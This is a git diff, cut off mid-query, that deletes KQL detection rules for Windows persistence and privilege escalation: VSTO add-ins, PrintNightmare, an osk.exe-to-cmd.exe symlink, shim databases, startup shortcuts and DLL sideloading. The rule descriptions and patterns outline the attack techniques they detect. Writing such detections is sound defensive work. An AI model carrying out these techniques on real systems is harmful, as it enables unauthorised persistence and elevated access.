-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql b/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
deleted file mode 100644
index f0a68dd4..00000000
--- a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/01/10
-// Level: medium
-// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
-// Tags: attack.t1137.006, attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Office\\Outlook\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Word\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Excel\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Powerpoint\\Addins" or RegistryKey contains "\\Software\\Microsoft\\VSTO\\Security\\Inclusion") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or (InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") or (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\integrator.exe" or InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") or InitiatingProcessFolderPath endswith "\\Teams.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql b/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
deleted file mode 100644
index 128c30fe..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/07
-// Level: medium
-// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
-// Tags: attack.persistence, attack.t1574
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
deleted file mode 100644
index 3c143992..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Lednyov Alexey, oscd.community, Sreeman
-// Date: 2020/10/16
-// Level: high
-// Description: Detects potential persistence behavior using the windows telemetry registry key.
-Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
-This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
-The problem is, it will run any arbitrary command without restriction of location or type.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceRegistryEvents
-| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql b/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
deleted file mode 100644
index 3ae13744..00000000
--- a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
-If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
-Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
-
-// Tags: attack.persistence, attack.t1547
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql b/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
deleted file mode 100644
index 38a023b8..00000000
--- a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/06
-// Level: medium
-// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\shell\\SentinelOneScan\\command" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql b/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
deleted file mode 100644
index 8729ce64..00000000
--- a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE
-// Date: 2021/10/24
-// Level: high
-// Description: Detects PowerShell writing startup shortcuts.
-This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
-Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
-In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
-
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql b/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
deleted file mode 100644
index 9bfc80e6..00000000
--- a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
